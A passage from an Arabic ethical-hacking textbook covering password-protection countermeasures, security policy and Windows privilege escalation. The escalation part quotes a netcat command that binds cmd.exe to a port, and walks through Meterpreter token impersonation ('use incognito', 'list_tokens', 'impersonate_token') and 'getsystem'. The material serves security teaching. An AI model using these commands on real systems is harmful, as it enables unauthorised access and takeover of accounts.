‫‪ -10‬ﺗﺄﻛد ﻣن أن اﻟﺗطﺑﯾﻘﺎت ﻻ ﺗﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟذاﻛرة أو اﻟﻛﺗﺎﺑﺔ إﻟﻰ اﻟﻘرص‪ .‬إذا ﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﺳر ﻓﻲ اﻟذاﻛرة ﻓﺎن‬
‫ﻛﻠﻣﺎت اﻟﺳر ﯾﻣﻛن ﺳرﻗﺗﮭﺎ‪ .‬وﺑﻣﺟرد ﻣﻌرﻓﺔ ﻛﻠﻣﺔ اﻟﻣرور ﻓﻣن اﻟﺳﮭل ﻟﻠﻐﺎﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺗﺻﻌﯾد ﺣﻘوﻗﮭم ﻓﻲ اﺳﺗﺧدام اﻟﺗطﺑﯾﻖ‪.‬‬
‫‪ -11‬اﺳﺗﺧدام ﺳﻠﺳﻠﺔ ﻋﺷواﺋﯾﺔ )‪ (salt‬ﻓﻲ أوﻟﮫ أو أﺧره )‪ (prefix or suffix‬ﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻗﺑل ﺗﺷﻔﯾره‪ .‬ﺣﯾث ﯾﺳﺗﺧدم ھذا ﻹﺑطﺎل‬
‫‪ pre-computation‬و‪ .memorization‬ﺣﯾث ﻧﺟد ان ‪ salt‬ﻋﺎدة ﻣﺧﺗﻠف ﻟﺟﻣﯾﻊ اﻷﻓراد‪ ،‬ﻓﺈﻧﮫ ﻣن ﻏﯾر اﻟﻌﻣﻠﻲ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﻧﺎء‬
‫اﻟﺟداول ﻣﻊ ﻧﺳﺧﺔ ﻣﺷﻔرة واﺣد ﻣن ﻛل ﻛﻠﻣﺔ اﻟﻣرور‪ .‬أﻧظﻣﺔ ﯾوﻧﯾﻛس ﻋﺎدة ﺗﺳﺗﺧدم ‪.12 bit salt‬‬
‫‪ -12‬ﺗﻣﻛﯾن ‪ SYSKEY‬ﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻗوﯾﺔ ﻟﺗﺷﻔﯾر وﺣﻣﺎﯾﺔ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ .SAM‬ﻋﺎدة‪ ،‬ﯾﺗم ﺗﺧزﯾن ﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻟﺣﺳﺎﺑﺎت‬
‫اﻟﻣﺳﺗﺧدﻣﯾن ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ .SAM‬ﻓﻣن اﻟﺳﮭل ﺟدا ﻟﻠﺑرﻧﺎﻣﺞ ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور اﺳﺗﮭداف ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬ﻟﻠوﺻول إﻟﻰ‬
‫ﻛﻠﻣﺎت اﻟﺳر ﻟﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ﻟذا‪ ،‬ﻟﺗﺟﻧب ﻣﺛل ھذه اﻟﺣﺎﻻت‪ SYSKEY ،‬ﯾﺄﺗﻲ ﻓﻲ اﻟﺻورة‪ SYSKEY .‬ﯾوﻓر اﻟﺣﻣﺎﯾﺔ‬
‫ﻟﻠﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ ﻣرور ﺣﺳﺎب اﻟﻣﺳﺗﺧدم ‪ ،‬أي اﻟﻣﺧزﻧﺔ ﻓﻲ ﺑﯾﺎﻧﺎت ‪ SAM‬ﺿد ﺑراﻣﺞ ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت اﻟﺗﺷﻔﯾر‬
‫اﻟﻘوﯾﺔ‪ .‬ﺣﯾث اﻧﮫ أﻛﺛر ﺻﻌوﺑﺔ اﺗﺧﺎذ اﺟراءات ﻛﺳر ﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺷﻔرة ﻋن ﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻏﯾر ﻣﺷﻔرة‪.‬‬
‫‪ -13‬ﻻ ﺗﺳﺗﺧدم أﺑدا اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ وﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﻣﺛل ﺗﺎرﯾﺦ اﻟﻣﯾﻼد‪ ،‬اﻟزوج‪ ،‬أو اﻟطﻔل أو اﺳم ﺣﯾوان أﻟﯾف‪ .‬إذا ﻛﻧت‬
‫ﺗﺳﺗﺧدم ﻣﺛل ﻛﻠﻣﺎت اﻟﺳر ھذه‪ ،‬ﻓﺎﻧﮫ ﯾﺻﺑﺢ ﻣن اﻟﺳﮭل ﺟدا ﻟﻠﻧﺎس اﻟذﯾن ھم ﻗرﯾب ﻣﻧك ﻛﺳر ﺗﻠك اﻟﻛﻠﻣﺎت‪.‬‬
‫‪ -14‬ﻣراﻗﺑﺔ ﺳﺟﻼت اﻟﺧﺎدم ﻟﻠﻛﺷف ﻋن ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪ (Brute Force attack‬ﻋﻠﻰ ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ﻋﻠﻰ اﻟرﻏم ﻣن‬
‫أن ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‪ ،‬ﯾﺻﻌب إﯾﻘﺎﻓﮭﺎ‪ ،‬وﻟﻛن ﯾﻣﻛن رﺻدھﺎ ﺑﺳﮭوﻟﺔ ﻣن ﺧﻼل رﺻد ﺳﺟل ﺧﺎدم اﻟوﯾب‪ .‬ﺣﯾث ان ﻣﻊ ﻛل ﻣﺣﺎوﻟﺔ‬
‫ﺗﺳﺟﯾل دﺧول ﻓﺎﺷﻠﺔ‪ ،‬ﯾﺗم ﺗﺳﺟﯾل ‪ HTTP 401 status code‬ﻓﻲ ﺳﺟﻼت ﺧﺎدم اﻟوﯾب اﻟﺧﺎص ﺑك‪.‬‬
‫‪ -15‬ﻗﻔل اﻟﺣﺳﺎب ﺿد اﻟﺗﻌرض ﻟﻌدد ﻛﺑﯾر ﺟدا ﻣن اﻟﺗﺧﻣﯾﻧﺎت ﻛﻠﻣﺔ اﻟﻣرور اﻟﻐﯾر ﺻﺣﯾﺣﺔ وﺗﺳﻣﻰ ‪ .password throttling‬ھذا ﯾوﻓر‬
‫اﻟﺣﻣﺎﯾﺔ ﺿد ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ واﻟﺗﺧﻣﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪393‬‬

‫ﺗﻧﻔﯾذ وﻓرض ﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﻗوﯾﺔ ‪Implement and Enforce A Strong Security Policy‬‬

‫ﺗوﻓر ﺳﯾﺎﺳﺔ أﻣن ﻗوﯾﺔ اﻷﺳس ﻣن أﺟل اﻟﺗﻧﻔﯾذ اﻟﻧﺎﺟﺢ ﻟﻠﻣﺷﺎرﯾﻊ اﻟﻣﺗﺻﻠﺔ ﺑﺎﻷﻣن ﻓﻲ اﻟﻣﺳﺗﻘﺑل؛ وھذا ھو أول إﺟراء ﯾﺟب اﺗﺧﺎذھﺎ ﻟﻠﺣد ﻣن‬
‫ﻣﺧﺎطر اﺳﺗﺧدام اﻋﺗراض ﻣن أي ﻣن ﻣﺻﺎدر اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺷرﻛﺔ‪ .‬اﻟﺧطوة اﻷوﻟﻰ ﻧﺣو زﯾﺎدة أﻣن اﻟﺷرﻛﺔ ھو إدﺧﺎل وﺗﻧﻔﯾذ ﺳﯾﺎﺳﺔ اﻷﻣن‪.‬‬
‫ﻓﺈن اﻟﺳﯾﺎﺳﺔ ﺗﺻف أﯾﺿﺎ ﺑﺗﻔﺻﯾل ﻣﻌﻧﻰ اﻻﺳﺗﺧدام اﻟﻣﻘﺑول‪ ،‬ﻓﺿﻼ ﻋن إدراج اﻷﻧﺷطﺔ اﻟﻣﺣظورة‪.‬‬

‫اﻟﺗﻧﻔﯾذ اﻟﺳﻠﯾم ﻟﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﻗوﯾﺔ ﻣﻔﯾد ﻟﻠﻐﺎﯾﺔ ﻷﻧﮭﺎ ﺳوف ﺗﺗﺣول ﻟﯾس ﻓﻘط ﻟﺟﻣﯾﻊ اﻟﻣوظﻔﯾن اﻟﺧﺎص ﺑك إﻟﻰ اﻟﻣﺷﺎرﻛﯾن ﻓﻲ ﺟﮭود اﻟﺷرﻛﺔ ﻟﺗﺄﻣﯾن‬
‫اﻻﺗﺻﺎﻻت‪ ،‬وﻟﻛن أﯾﺿﺎ ﯾﺳﺎﻋد ﻋﻠﻰ اﻟﺗﻘﻠﯾل ﻣن ﺧطر ﺣدوث ﺧرق أﻣﻧﻲ ﻣﺣﺗﻣل ﻣن ﺧﻼل اﻷﺧطﺎء " اﻹﻧﺳﺎن ﻋﺎﻣل “‪ .‬ھذه ﻋﺎدة ﻣﺎ ﺗﻛون‬
‫ﻗﺿﺎﯾﺎ ﻣﺛل اﻟﻛﺷف ﻋن اﻟﻣﻌﻠوﻣﺎت )ﻏﯾر اﻟﻣﺻرح ﺑﮫ( ﻏﯾر ﻣﻌروف‪ ،‬واﺳﺗﺧدام ﻏﯾر آﻣن أو ﻏﯾر ﻻﺋﻖ ﻟﻺﻧﺗرﻧت واﻟﻌدﯾد ﻣن اﻷﻧﺷطﺔ اﻟﺧطرة‬
‫اﻷﺧرى‪.‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈن ﻋﻣﻠﯾﺔ وﺟود ﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﺗﺳﺎﻋد أﯾﺿﺎ ﻋﻠﻰ ﺗﺣدﯾد اﻷﺻول اﻟﮭﺎﻣﺔ ﻟﻠﺷرﻛﺔ‪ ،‬واﻟطرق اﻟﺗﻲ ﺑﮭﺎ ﯾﺟب أن ﺗﻛون ﻣﺣﻣﯾﺔ‪،‬‬
‫وﺳﯾﻛون أﯾﺿﺎ ﺑﻣﺛﺎﺑﺔ وﺛﯾﻘﺔ ﻣرﻛزﯾﺔ‪ ،‬ﺑﻘدر ﻣﺎ ھو ﺣﻣﺎﯾﺔ اﻷﺻول اﻷﻣﻧﯾﺔ اﻟﻣﻌﻧﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪394‬‬

‫‪Escalating Privileges 5.4‬‬

‫ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات )‪ (Escalating privileges‬ھﻲ اﻟﻣرﺣﻠﺔ اﻟﺛﺎﻧﯾﺔ ﻣن ﻧظﺎم اﻟﻘرﺻﻧﺔ‪ .‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ‪ ،‬ﯾﺳﺗﺧدم اﻟﻣﮭﺎﺟﻣﯾن ﻛﻠﻣﺎت اﻟﻣرور‬
‫اﻟﺗﻲ ﺗم ﻛﺳرھﺎ ﺳﺎﺑﻘﺎ ﻟﻠﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎزات ذات ﻣﺳﺗوى أﻋﻠﻰ ﻣن أﺟل ﺗﻧﻔﯾذ ﻋﻣﻠﯾﺎت ﻣﮭﻣﮫ ﻟﻠﻐﺎﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪ .‬وھﻧﺎ ﺳوف ﻧوﺿﺢ‬
‫اﻷدوات واﻟﺗﻘﻧﯾﺎت اﻟﺗﻲ ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﻣﺧﺗﻠﻔﺔ ﺑﺷﻛل واﺿﺢ ﻓﻲ اﻟﺷراﺋﺢ اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫‪Privilege Escalation‬‬
‫ﻓﻲ ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‪ ،‬ﻓﺈن اﻟﻣﮭﺎﺟم ﯾﻛﺗﺳب اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺎت واﻟﺑﯾﺎﻧﺎت واﻟﺗطﺑﯾﻘﺎت اﻟﻣرﺗﺑطﺔ ﺑﮭﺎ ﻣن ﺧﻼل اﻻﺳﺗﻔﺎدة ﻣن ﻋﯾوب‬
‫ﻓﻲ اﻟﺗﺻﻣﯾم‪ ،‬او ﻋﯾوب ﻓﻲ ﺗطﺑﯾﻖ اﻟﺑرﻣﺟﯾﺎت وإﻋداد أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺑطرﯾﻘﺔ ﺳﯾﺋﺔ‪ ،‬اﻟﺦ‪.‬‬

‫ﺑﻣﺟرد اﻛﺗﺳﺎب اﻟﻣﮭﺎﺟم ﺣﻖ اﻟوﺻول إﻟﻰ اﻟﻧظﺎم ﺑﺎﻟﻌﯾد ﻣﻊ اﺳم ﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﺻﺎﻟﺣﮫ‪ ،‬ﻓﺎﻧﮫ ﺳوف ﯾﺣﺎول زﯾﺎدة اﻣﺗﯾﺎزاﺗﮫ ﻣن ﺧﻼل‬
‫اﻟﺗﺻﻌﯾد اﻟﻰ ﺣﺳﺎب ﻣﺳﺗﺧدم ﻣﻊ اﻣﺗﯾﺎزات أﻋﻠﻰ‪ ،‬ﻣﺛل ﺣﺳﺎب اﻟﻣﺳؤول)‪ . (Admin account‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻟدﯾﮫ ﺣﻖ‬
‫اﻟوﺻول إﻟﻰ ﺧﺎدم‪ ، WZK SP1‬ﻓﺎﻧﮫ ﯾﻣﻛﻧﮫ ﺗﺷﻐﯾل أداة ﻣﺛل ‪ ERunAs2X.exe‬ﻟﺗﺻﻌﯾد اﻣﺗﯾﺎزات إﻟﻰ اﻣﺗﯾﺎزات اﻟﻧظﺎم ﺑﺎﺳﺗﺧدام"‬
‫‪ "nc.exe -I -p 50000 -d -e cmd.exe‬ﻣﻊ ھذه اﻻﻣﺗﯾﺎزات ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﺑﺳﮭوﻟﺔ‪ ،‬وﺣذف اﻟﻣﻠﻔﺎت‪ ،‬وﺣﺗﻰ ﯾﻣﻛﻧﮫ ﻧﺷر‬
‫اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ‪ ،‬أي ﺑرﻧﺎﻣﺞ ﻏﯾر اﻟﻣرﻏوب ﻓﯾﮭﺎ ﻣﺛل ﺣﺻﺎن طروادة‪ ،‬واﻟﻔﯾروﺳﺎت‪ ،‬اﻟﺦ ﻓﻲ اﻟﻧظم اﻟﺿﺣﯾﺔ‪.‬‬

‫ﻟذﻟك ﻓﺎن ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﻣطﻠوب وذﻟك ﻋﻧدﻣﺎ ﺗرﯾد اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ اﻷﻧظﻣﺔ اﻟﮭدف‪ .‬ﻓﻲ اﻷﺳﺎس‪ ،‬ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﯾﺣدث‬
‫ﻓﻲ ﺷﻛﻠﯾن‪ .‬ھم ﺗﺻﻌﯾد اﻣﺗﯾﺎزات رأﺳﻲ )‪ (vertical privilege escalation‬وﺗﺻﻌﯾد اﻣﺗﯾﺎزات أﻓﻘﻲ)‪. (Horizontal privilege escalation‬‬

‫ﺗﺻﻌﯾد اﻣﺗﯾﺎزات أﻓﻘﻲ)‪ : (Horizontal privilege escalation‬ﻓﯾﮫ ﯾﺣﺎول اﻟﻣﺳﺗﺧدم ﻏﯾر اﻟﻣﺻرح ﺑﮫ ﻟﻠوﺻول إﻟﻰ اﻟﻣوارد واﻟوظﺎﺋف‬
‫واﻻﻣﺗﯾﺎزات اﻷﺧرى اﻟﺗﻲ ﺗﻧﺗﻣﻲ إﻟﻰ أذن ﻣﺳﺗﺧدم أﺧر أي اﻻﺛﻧﯾن ﻟﮭم ﻧﻔس اﻣﺗﯾﺎزات اﻟوﺻول‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻣﺳﺗﺧدم ‪ A‬ﻟﻸﻧﺗرﻧت‬
‫اﻟﻣﺻرﻓﻲ ﯾﻣﻛﻧﮫ اﻟوﺻول إﻟﻰ ﺣﺳﺎب ﻣﺳﺗﺧدم ‪ B‬اﻟﻣﺻرﻓﻲ ﺑﺳﮭوﻟﺔ‪.‬‬

‫ﺗﺻﻌﯾد اﻣﺗﯾﺎزات رأﺳﻲ)‪ : (vertical privilege escalation‬ﻓﯾﮫ ﯾﺣﺎول اﻟﻣﺳﺗﺧدم اﻟﻐﯾر ﻣﺻرح ﺑﮫ اﻟوﺻول إﻟﻰ اﻟﻣوارد واﻟوظﺎﺋف ﻟﻠﻣﺳﺗﺧدم‬
‫أﺧر ﻣﻊ اﻣﺗﯾﺎزات أﻋﻠﻰ‪ ،‬ﻣﺛل اﻟﺗطﺑﯾﻖ أو ﻣدﯾري ﻣوﻗﻊ‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻟﺷﺧص ﯾؤدى اﻟﺧدﻣﺎت اﻟﻣﺻرﻓﯾﺔ ﻋﺑر اﻹﻧﺗرﻧت اﻟوﺻول إﻟﻰ‬
‫ﻣوﻗﻊ ﻣﻊ اﻣﺗﯾﺎزات ﻣدﯾر )‪.(Administrative functions‬‬

‫‪Privilege Escalation Tool: Active@ Password Changer‬‬

‫اﻟﻣﺻدر‪http://www.password-changer.com :‬‬
‫‪ Active@Password Changer‬ھﻲ أداة ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﺳواء ﺑﺈﻋﺎدة إﻧﺷﺎء او اﺳﺗرداد اﻟﻣﺳؤول اﻟﻣﺣﻠﻲ وﻛﻠﻣﺎت ﻣرور اﻟﻣﺳﺗﺧدم‬
‫وذﻟك ﻋﻧد ﻓﻘدان او ﻧﺳﯾﺎن ﻛﻠﻣﺎت ﻣرور اﻟﺧﺎﺻﺔ ﺑﻣﺳﺋوﻟﻲ اﻹدارة أو إذا ﺗم ﻏﻠﻖ ﺣﺳﺎب اﻟﻣﺳﺗﺧدم اﻟﻣﺳؤول أو ﻋطل‪ .‬وﺗﺷﻣل اﻟﺳﻣﺎت‬
‫اﻟرﺋﯾﺳﯾﺔ ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﻣن أﻗﺳﺎم ﻣﺗﻌددة واﻷﻗراص اﻟﺻﻠﺑﺔ‪ ،‬ﻋرض واﻟﻛﺷف ﻋن ﺟﻣﯾﻊ ﻗواﻋد ﺑﯾﺎﻧﺎت ﻣﺎﯾﻛروﺳوﻓت اﻷﻣن‪ ،‬إﻋﺎدة‬
‫ﺗﻌﯾﯾن ‪ /‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺳﺗﺧدم اﻟﻣﺳؤول‪ ،‬وﻋرض ﻣﻌﻠوﻣﺎت ﻛﺎﻣﻠﺔ ﻋن أي ﺣﺳﺎب ﻣﺳﺗﺧدم ﻣﺣﻠﻲ‪ ،‬اﻟﺦ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪395‬‬

‫‪Using Impersonation Tokens‬‬

‫ﺑﻌد أن ﺗﻛون ﻗد ﺗﻣﻛﻧت ﻣن اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ ،‬ﻣن اﻟﻣﮭم أن ﺗﻘوم ﺑﺗﺻﻌﯾد اﻣﺗﯾﺎزاﺗك ﻗدر اﻹﻣﻛﺎن‪ .‬ﻋﻣوﻣﺎ‪ ،‬ﺑﻌد اﻟوﺻول‬
‫اﻟﻰ اﻟﺟﮭﺎز ﻓﺈﻧك ﺗﻣﻠك اﻟوﺻول إﻟﻰ ﺣﺳﺎب ﻣﺳﺗﺧدم ﻟدﯾﮫ اﻣﺗﯾﺎزات ﻣﻧﺧﻔﺿﺔ )ﻣﺳﺗﺧدم اﻟﻛﻣﺑﯾوﺗر(؛ وﻣﻊ ذﻟك‪ ،‬ﻗد ﯾﻛون ھدﻓﻧﺎ ھو ﺣﺳﺎب‬
‫اﻟﻣﺳؤول‪ .‬ﻟذﻟك ﺳوف ﺗﺣﺗﺎج اﻟﻰ ﺑﻌض اﻟطرق ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات اﻟﺧﺎﺻﺔ ﺑك‪.‬‬

‫ﻓﻲ ھذا اﻟﺟزء‪ ،‬ﺳوف ﻧﺗﻌﻠم ﻛﯾﻔﯾﺔ اﻧﺗﺣﺎل ﺷﺧﺻﯾﺔ ﻣﺳﺗﺧدم آﺧر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺑﺎﺳﺗﺧدام رﻣوز اﻻﻧﺗﺣﺎل)‪. (impersonation tokens‬‬
‫اﻟرﻣوز)‪ (Tokens‬ﺗﺣﺗوي ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻷﻣﻧﯾﺔ ﻟﺟﻠﺳﺔ ﺗﺳﺟﯾل اﻟدﺧول ﺣﯾث ﺗﺣدد اﻟﻣﺳﺗﺧدﻣﯾن واﻟﻣﺟﻣوﻋﺎت ﻟﻠﻣﺳﺗﺧدم‪ ،‬واﻻﻣﺗﯾﺎزات‬
‫ﻟﻠﻣﺳﺗﺧدم‪ .‬ﻋﻧد ﺗﺳﺟﯾل دﺧول ﻣﺳﺗﺧدم ﻓﻲ ﻧظﺎم وﯾﻧدوز‪ ،‬ﻓﺈﻧﮭﺎ ﺗﻘدم ﻟﮫ رﻣز وﺻول)‪ (access token‬ﻛﺟزء ﻣن ﺟﻠﺳﺔ اﻟﻣﺻﺎدﻗﺔ‪ .‬رﻣوز‬
‫اﻻﻧﺗﺣﺎل )‪ (impersonation tokens‬ﺗﺳﻣﺢ ﻟﻧﺎ ﺑﺗﺻﻌﯾد اﻣﺗﯾﺎزات ﻟدﯾﻧﺎ ﻋن طرﯾﻖ اﻧﺗﺣﺎل ﻣﺳﺗﺧدم اﺧر‪ .‬ﺣﺳﺎب اﻟﻧظﺎم)‪، (system account‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻗد ﺗﺣﺗﺎج إﻟﻰ ﺗﺷﻐﯾل ﻛﻣﺳﺗﺧدم ﻣﺳؤول ﻟدوﻣﯾن ﻟﻠﺗﻌﺎﻣل ﻣﻊ ﻣﮭﻣﺔ ﻣﺣددة ﺛم ﺗﺗﻧﺎزل ﻋن ھذه اﻟﺳﻠطﺔ ﻋﻧد اﻻﻧﺗﮭﺎء‪ .‬ﻧﺣن ﺳوف‬
‫ﺗﺳﺗﺧدم ھذا اﻟﺿﻌف ﻟرﻓﻊ ﺣﻘوق اﻟوﺻول ﻟدﯾﻧﺎ‪.‬‬

‫ﻧﺑدأ اﻻن اﺳﺗﻛﺷﺎف رﻣوز اﻻﻧﺗﺣﺎل )‪ (impersonation tokens‬ﻣن ﺧﻼل اﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ‪ .Meterpreter‬وﯾﺗم ذﻟك ﻣن‬ ‫‪-‬‬
‫ﺧﻼل اﺳﺗﺧدام ‪ Metasploit‬ﻟﻣﮭﺎﺟﻣﺔ اﻟﻣﺿﯾف ﻣن أﺟل اﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ‪ Meterpreter‬ﻛﻣﺎ ﺗﺣدﺛﻧﺎ ﻋﻧﮫ ﺳﺎﺑﻘﺎ‪.‬‬
‫ﻟﺗﺳﮭﯾل اﻻﻣر ﺳوف ﻧﺳﺗﺧدم ‪ armitage‬ﻛﺎﻻﺗﻰ وﻧﺣﺻل ﻣن ﺧﻼﻟﮫ ﻗذﯾﻔﺔ ‪:Meterpreter‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪396‬‬

‫ﻣن ﺧﻼل ‪ Meterpreter‬ﻧﺑدأ ﻋﻣﻠﯾﺔ اﻻﺣﺗﻼل ﻣن ﺧﻼل اﺳﺗﺧدام ‪ incognito‬ﻋن طرﯾﻖ طﺑﺎﻋﺔ اﻻﻣر ‪ use incognito‬ﻓﻲ‬ ‫‪-‬‬
‫ﻗذﯾﻔﺔ ‪ Meterpreter‬ﺛم ﻧﻘوم ﺑطﺑﺎﻋﺔ اﻻﻣر ‪ help‬ﻟرؤﯾﺔ ﺟﻣﯾﻊ اﻹﻣﻛﺎﻧﯾﺎت اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣﻊ ‪ incognito‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻋﻧد طﺑﺎﻋﺔ اﻻﻣر ‪ help‬ﺳوف ﻧﻼﻗﻰ اﻟﻌدﯾد ﻣن اﻟﻣﺳﺎﻋدات وﻟﻛن ﻣﺎ ﯾﮭﻣﻧﺎ ھﻧﺎ ھو اﻟﻣﺳﺎﻋدات اﻟﺧﺎﺻﺔ ب ‪ incognito‬ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫اﻻن ﻧرﯾد اﻟﺣﺻول ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﻣﺳﺗﺧدﻣﯾن اﻟذﯾن ﻗﺎﻣوا ﺑﺗﺳﺟﯾل اﻟدﺧول اﻟﻣﺗﺎﺣﯾن ﺣﺎﻟﯾﺎ ﻓﻲ اﻟﻧظﺎم أو ﺗﻣﻛﻧوا ﻣن اﻟوﺻول إﻟﻰ‬ ‫‪-‬‬
‫اﻟﻧظﺎم ﻓﻲ اﻵوﻧﺔ اﻷﺧﯾرة‪ .‬وﻧﺣن ﻧﻔﻌل ذﻟك ﻣن ﺧﻼل ﺗﻧﻔﯾذ اﻷﻣر ‪ list_tokens‬ﻣﻊ اﻟﺧﯾﺎر )‪(-u‬ﻛﺎﻻﺗﻰ‪:‬‬

‫اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ‪ ،‬ﻧﻘوم ﺑﺗﺷﻐﯾل ھﺟوم اﻻﻧﺗﺣﺎل‪ ،‬وذﻟك ﻣن ﺧﻼل ﺑﻧﺎء اﻟﺟﻣﻠﺔ اﻟﺗﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام ‪ impersonate_token‬ﺛم ﻛﺗﺎﺑﺔ ]اﺳم‬ ‫‪-‬‬
‫اﻟﺣﺳﺎب ﻻﻧﺗﺣﺎل ﺻﻔﺔ[‪:‬‬
‫‪impersonate_token TEBA-293DD90F08\\JANA‬‬

‫‪ -‬إذا أردﻧﺎ اﻟﻧﺟﺎح‪ ،‬ﻓﻧﺣن اﻵن ﻧﺳﺗﺧدم اﻟﻧظﺎم اﻟﺣﺎﻟﻲ ﻛﻣﺳﺗﺧدم آﺧر‪.‬‬
‫اﻟﮭدف ﻣن ھﺟوم اﻻﻧﺗﺣﺎل ھو اﺧﺗﯾﺎر أﻋﻠﻰ ﻣﺳﺗوى ﻣن اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﻣﻛن‪ ،‬وﯾﻔﺿل ﺷﺧص ﯾرﺗﺑط أﯾﺿﺎ ﻋﺑر اﻟدوﻣﯾن‪ ،‬واﺳﺗﺧدام ﺣﺳﺎﺑﮫ‬
‫ﻟﻣزﯾد ﻣن اﻟﻐوص ﻓﻲ اﻟﺷﺑﻛﺔ‪.‬‬

‫أﯾﺿﺎ ﯾود طرﯾﻘﺔ أﺧرى ﻟرﻓﻊ اﻟﺻﻼﺣﯾﺎت ﻋن طرﯾﻖ اﻧﺗﺣﺎل اﻟﻣﺳﺗﺧدم ‪ system‬وھو أﯾﺿﺎ ﻣن ﺧﻼل ﻗذﯾﻔﺔ ‪ Meterpreter‬ﻋن طرﯾﻖ‬
‫طﺑﺎﻋﺔ اﻻﻣر ‪ getsystem‬وﯾﻣﻛﻧك أﯾﺿﺎ ﻣﻌرﻓﺔ ﺟﻣﯾﻊ ﺧﯾﺎراﺗﮫ ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎر ‪ –h‬ﻣﻌﮫ‪.‬‬

